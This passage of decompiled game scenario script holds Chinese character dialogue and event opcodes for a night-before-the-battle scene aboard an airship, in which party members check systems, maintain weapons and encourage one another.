"明天就要正式开始了。\x02\x03", "#00108F如果能见到贝尔和迪塔叔叔,我一定要问出\x01", "他们策动这一系列事件的真正目的……\x01", "而且还要尽力说服他们。\x02\x03", "#00101F可是,如果无法说服成功……\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00008F艾莉……\x02", ) CloseMessageWindow() ChrTalk( 0x10, ( "#00106F……对不起,\x01", "忍不住说出了丧气话。\x02\x03", "#00100F为了报答那些不顾自身安危,\x01", "向我们伸出援手的人们……\x02\x03", "更为了夺回小琪雅,\x01", "我们是绝不能输的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00002F……明天一起加油吧,艾莉。\x01", "我和大家都会陪在你身边的。\x02", ) ) CloseMessageWindow() ChrTalk( 0x10, ( "#00104F……呵呵,嗯。\x02\x03", "#00102F谢谢,罗伊德。\x01", "多亏你的劝慰,\x01", "我感觉轻松了一些。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 5) Jump("loc_1029") label("loc_FBE") ChrTalk( 0x10, ( "#00104F谢谢,罗伊德。\x01", "多亏你的劝慰,\x01", "我感觉轻松了一些。\x02\x03", "#00102F今天就早点休息……\x01", "为明天做好准备吧。\x02", ) ) CloseMessageWindow() label("loc_1029") TalkEnd(0xFE) Return() 
# Function_6_D2D end def Function_7_102D(): pass label("Function_7_102D") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x66), scpexpr(EXPR_PUSH_LONG, 0x14), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_10B3") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1050") Call(0, 23) Jump("loc_10AE") label("loc_1050") ChrTalk( 0xB, ( "#00204F把手头的事情做完以后,\x01", "我就会去甲板的。\x02\x03", "#00202F要谈的事情……\x01", "就等到那时再说吧。\x02", ) ) CloseMessageWindow() label("loc_10AE") Jump("loc_151E") label("loc_10B3") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1498") ChrTalk( 0xB, ( "#00203F(快速敲击键盘……)\x02\x03", "#00200F嗯,这样就准备得差不多了吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F缇欧……\x01", "你在做什么呢?\x02", ) ) CloseMessageWindow() OP_63(0xB, 0x0, 1700, 0x26, 0x26, 0xFA, 0x1) Sleep(1000) OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xB, 0x10) TurnDirection(0xB, 0x101, 0) OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_11CD") Jump("loc_1217") label("loc_11CD") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_11ED") OP_52(0xB, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1217") label("loc_11ED") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_120D") OP_52(0xB, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1217") label("loc_120D") OP_52(0xB, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xB, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1217") OP_52(0xB, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xB, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xB, 0x10) ChrTalk( 0xB, ( "#00202F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00203F我到时也会离开梅尔卡瓦,\x01", "和大家一起作战……\x02\x03", "#00200F所以控制通讯终端之后的网络侵入\x01", "工作要交给约纳和芙兰来处理,\x01", "现在就要完成交接。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00001F这样啊……\x01", "真是辛苦你了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#00204F没什么,马上就要\x01", "处理完了,不必担心。\x02\x03", "#00202F罗伊德前辈只要摆出一副\x01", "队长的架势,威严地站在边上\x01", "看着就可以了。\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 
0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#00006F那可不行啊,为了明天的作战,\x01", "还有好多事情需要准备呢。\x02\x03", "#00000F既然你这么有干劲,\x01", "这里就全部交给你了。\x02\x03", "缇欧,你们要\x01", "注意休息哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xB, ( "#00204F嗯,知道了,\x01", "罗伊德前辈也要好好休息。\x02", ) ) CloseMessageWindow() SetChrSubChip(0xB, 0x0) SetScenarioFlags(0x1DA, 6) ClearChrFlags(0xB, 0x10) Jump("loc_151E") label("loc_1498") ChrTalk( 0xB, ( "#00204F为了明天的突入行动,\x01", "我正在对梅尔卡瓦的系统\x01", "做最终检查。\x02\x03", "#00202F检查完毕之后,\x01", "我就会去休息了。\x01", "罗伊德前辈也要好好休息。\x02", ) ) CloseMessageWindow() label("loc_151E") TalkEnd(0xFE) Return() # Function_7_102D end def Function_8_1522(): pass label("Function_8_1522") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x67), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_1597") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1545") Call(0, 24) Jump("loc_1592") label("loc_1545") ChrTalk( 0xE, ( "#00304F那我们稍后见吧。\x02\x03", "#00302F等我检修完这东西之后,\x01", "马上就会过去的。\x02", ) ) CloseMessageWindow() label("loc_1592") Jump("loc_1845") label("loc_1597") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_17D5") ChrTalk( 0xE, "#00300F哟,罗伊德。\x02", ) CloseMessageWindow() ChrTalk( 0x101, ( "#00000F兰迪,你们正在\x01", "检修武器吧?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#00302F嗯,毕竟明天的作战可以算是\x01", "我们至今为止要面对的最大难关。\x02\x03", "#00304F有可能会用到『狂战士』,\x01", "为了预防万一,现在必须要\x01", "认真做好准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F唔,至今为止总是很忙,\x01", "一直都没时间维护武器……\x02\x03", "#00003F我是不是也应该趁着今晚,\x01", "好好检查一下旋棍呢?\x02", ) ) CloseMessageWindow() ChrTalk( 0xE, ( "#00309F嗯,还是检查一下吧。\x02\x03", "#00303F虽说你的武器和来复枪不同,\x01", "不需要特别检修\x01", "精密部件……\x02\x03", "#00300F但就算只是擦拭一下,\x01", "手感也会有很大改善。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00005F原、原来如此……\x01", "也许正如你所说呢。\x02\x03", "#00002F多谢指点,我稍后\x01", "也去检查一下。\x02", ) ) CloseMessageWindow() SetScenarioFlags(0x1DA, 7) Jump("loc_1845") label("loc_17D5") ChrTalk( 0xE, ( "#00304F你最好也在明天之前,\x01", "把武器认真检修一番。\x02\x03", "#00309F一定要像对待绝世美女那样,\x01", "小心翼翼地温柔处理哦。\x02", ) ) CloseMessageWindow() label("loc_1845") TalkEnd(0xFE) Return() # Function_8_1522 end def Function_9_1849(): pass label("Function_9_1849") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x68), scpexpr(EXPR_PUSH_LONG, 0x16), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_18EF") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_186C") Call(0, 25) Jump("loc_18EA") label("loc_186C") ChrTalk( 0xF, ( "#10106F那、那个……\x01", "我有件事必须要拜托\x01", "罗伊德警官。\x02\x03", "#10101F稍后请到甲板来找我吧。\x01", "我处理完手边的事情之后\x01", "就会过去的……\x02", ) ) CloseMessageWindow() label("loc_18EA") Jump("loc_1963") label("loc_18EF") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 0)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1901") Call(0, 10) Jump("loc_1963") label("loc_1901") ChrTalk( 0xF, ( "#10100F我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() label("loc_1963") TalkEnd(0xFE) Return() # Function_9_1849 end def Function_10_1967(): pass label("Function_10_1967") OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xF, 0x10) TurnDirection(0xF, 0x101, 0) OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), 
scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_19F8") Jump("loc_1A42") label("loc_19F8") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_1A18") OP_52(0xF, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1A42") label("loc_1A18") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_1A38") OP_52(0xF, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1A42") label("loc_1A38") OP_52(0xF, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xF, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1A42") OP_52(0xF, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xF, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xF, 0x10) ClearChrFlags(0xF, 0x10) TurnDirection(0xC, 0x101, 0) OP_4B(0xC, 0xFF) ChrTalk( 0x101, ( "#00000F辛苦你们了,诺艾尔、芙兰。\x02\x03", "#00002F明天就要展开作战了,\x01", "但这里的气氛却很平和呢。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#10102F真不好意思。\x02\x03", "#10106F我正在检修武器,\x01", "芙兰却突然跑了进来……\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01909F呵呵,我是来给\x01", "姐姐打气的~\x02\x03", "#01904F因为我已经做好了\x01", "充足的准备。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00009F哈哈,真是可靠啊。\x02\x03", "#00000F芙兰,你明天也要在\x01", "后援岗位上大显身手哦,\x01", "今天就尽量养精蓄锐吧。\x02", ) ) CloseMessageWindow() ChrTalk( 0xC, ( "#01902F嗯,当然~\x01", "……其实,我就是为了\x01", "这个才来的~!\x02\x03", "#01909F不管怎么说,\x01", "我只要待在姐姐身边,\x01", "就可以补充能量了呢!\x02", ) ) CloseMessageWindow() OP_63(0x101, 0x0, 2000, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) OP_63(0xF, 0x0, 1700, 0x10, 0x13, 0xFA, 0x1) Sound(23, 0, 100, 0) Sleep(1000) ChrTalk( 0x101, ( "#00000F哈哈,也许\x01", "正如你所说。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, ( "#10106F唉,真是的……\x01", "只要别妨碍到我就好。\x02\x03", "#10100F那、那个,罗伊德警官,\x01", "我今天晚上还要\x01", "再和司令联络一次。\x02\x03", "#10103F为了明天的作战,\x01", "还是再做一次最终确认为好。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00004F嗯,那就拜托你了。\x02\x03", "#00000F诺艾尔,检修完武器之后,\x01", "要早点休息哦。\x02", ) ) CloseMessageWindow() ChrTalk( 0xF, "#10109F好的!\x02", ) CloseMessageWindow() SetChrSubChip(0xF, 0x0) OP_93(0xC, 0x10E, 0x0) OP_4C(0xC, 0xFF) SetScenarioFlags(0x1DB, 0) Return() # Function_10_1967 end def Function_11_1DBE(): pass label("Function_11_1DBE") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x69), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_1E52") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), 
scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1DE1") Call(0, 26) Jump("loc_1E4D") label("loc_1DE1") ChrTalk( 0xA, ( "#10404F还有一件事,\x01", "我觉得应该悄悄\x01", "告诉你。\x02\x03", "#10402F稍后到甲板上来吧。\x01", "我和阿巴斯喝完酒以后\x01", "就会过去。\x02", ) ) CloseMessageWindow() label("loc_1E4D") Jump("loc_1EFB") label("loc_1E52") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_1E64") Call(0, 12) Jump("loc_1EFB") label("loc_1E64") ChrTalk( 0xA, ( "#10404F总之,既然上面已经下达了许可,\x01", "我们就不必再顾虑其它事情,\x01", "只需专心完成使命即可。\x02\x03", "#10402F呵呵,看来明天会很忙碌呢,\x01", "要趁现在好好休息一番。\x02", ) ) CloseMessageWindow() label("loc_1EFB") TalkEnd(0xFE) Return() # Function_11_1DBE end def Function_12_1EFF(): pass label("Function_12_1EFF") OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0xA, 0x10) TurnDirection(0xA, 0x101, 0) OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_1F90") Jump("loc_1FDA") label("loc_1F90") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_1FB0") OP_52(0xA, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1FDA") label("loc_1FB0") Jc((scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_1FD0") OP_52(0xA, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_1FDA") label("loc_1FD0") OP_52(0xA, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0xA, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_1FDA") OP_52(0xA, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0xA, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0xA, 0x10) OP_52(0x101, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) ClearChrFlags(0x8, 0x10) TurnDirection(0x8, 0x101, 0) OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_IMOD), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x168), scpexpr(EXPR_ADD), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_SUB), scpexpr(EXPR_STUB), 
scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0xB4), scpexpr(EXPR_IDIV), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2D), scpexpr(EXPR_LEQ), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x13B), scpexpr(EXPR_GE), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x195), scpexpr(EXPR_LEQ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_OR), scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x4), scpexpr(EXPR_PUSH_LONG, 0x2A3), scpexpr(EXPR_GE), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_2090") Jump("loc_20DA") label("loc_2090") Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_20B0") OP_52(0x8, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_20DA") label("loc_20B0") Jc((scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_GTR), scpexpr(EXPR_END)), "loc_20D0") OP_52(0x8, 0x8, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_20DA") label("loc_20D0") OP_52(0x8, 0x8, (scpexpr(EXPR_GET_CHR_WORK, 0x8, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_20DA") OP_52(0x8, 0x4, (scpexpr(EXPR_GET_CHR_WORK, 0x101, 0x5), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x101, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) OP_52(0x8, 0x5, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) SetChrFlags(0x8, 0x10) ClearChrFlags(0xA, 0x10) ClearChrFlags(0x8, 0x10) ChrTalk( 0x101, ( "#00005F瓦吉、阿巴斯……\x01", "你们在喝酒吗?\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#10404F嗯,因为我们已经\x01", "完成了必要的准备工作。\x02\x03", "#10402F呵呵,你要不要也来一杯?\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F喂喂……明天还要作战呢,\x01", "你们这样没问题吗?\x02\x03", "#00001F边上已经摆着很多\x01", "被你们喝空的杯子了……\x02", ) ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F不必担心,\x01", "这是让维恩图斯特地\x01", "调制的无酒精鸡尾酒。\x02\x03", "不会对明天的作战\x01", "造成任何影响。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F啊,是这样啊……\x02\x03", "#00000F算啦,既然阿巴斯这么说,\x01", "那我这次就相信了。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, ( "#10409F呵呵,我一个人喝的时候,\x01", "你也应该相信啊。\x02\x03", "#10403F……对了,有件事情还是\x01", "通知你一声比较好。\x02\x03", "#10400F关于明天的作战,法王阁下\x01", "已经下达了正式的参战许可。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, "#00005F啊……是吗。\x02", ) CloseMessageWindow() ChrTalk( 0x8, ( "#12100F梅尔卡瓦的主要用途是执行\x01", "隐秘活动,本应尽量避免将其\x01", "使用于大规模的作战中……\x02\x03", "但考虑到整个大陆的混乱状况,\x01", "就算稍微有所暴露,也是没有办法。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F这样啊……\x01", "教会能做出这种判断,真是值得感谢。\x02\x03", "#00013F……总之,明天就要决战了,\x01", "还请二位助我一臂之力。\x02", ) ) CloseMessageWindow() ChrTalk( 0xA, "#10402F呵呵,明白了,队长。\x02", ) CloseMessageWindow() ChrTalk( 0x8, "#12102F我们自然会全力相助。\x02", ) CloseMessageWindow() SetChrSubChip(0xA, 0x0) SetChrSubChip(0x8, 0x0) SetScenarioFlags(0x1DB, 1) Return() # Function_12_1EFF end def Function_13_24BA(): pass label("Function_13_24BA") TalkBegin(0xFE) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x69), scpexpr(EXPR_PUSH_LONG, 0x12), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_25D4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_NEQUZ_I64), scpexpr(EXPR_END)), "loc_24E2") Call(0, 26) Jump("loc_25CF") label("loc_24E2") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_24EC") Jc((scpexpr(EXPR_GET_RESULT, 0x0), 
scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_NEQ), scpexpr(EXPR_END)), "loc_25CF") Menu( 0, -1, -1, 1, ( "对话\x01", # 0 "编组队伍\x01", # 1 "放弃\x01", # 2 ) ) MenuEnd(0x0) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_2533"), (1, "loc_25A4"), (SWITCH_DEFAULT, "loc_25C0"), ) label("loc_2533") ChrTalk( 0x8, ( "#12100F真是的……\x01", "那可是机密事项啊。\x02\x03", "#12102F……算了,这也没办法。\x01", "让你们知道,应该也不会有什么问题。\x02", ) ) CloseMessageWindow() Jump("loc_25CA") label("loc_25A4") OP_32(0xFF, 0xF9, 0x0) PartySelect(0) Fade(500) OP_0D() RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Jump("loc_25CA") label("loc_25C0") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0xFF), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_25CA") Jump("loc_24EC") label("loc_25CF") Jump("loc_26E6") label("loc_25D4") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1DB, 1)), scpexpr(EXPR_EQUZ), scpexpr(EXPR_END)), "loc_25E6") Call(0, 12) Jump("loc_26E6") label("loc_25E6") RunExpression(0x0, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) label("loc_25F0") Jc((scpexpr(EXPR_GET_RESULT, 0x0), 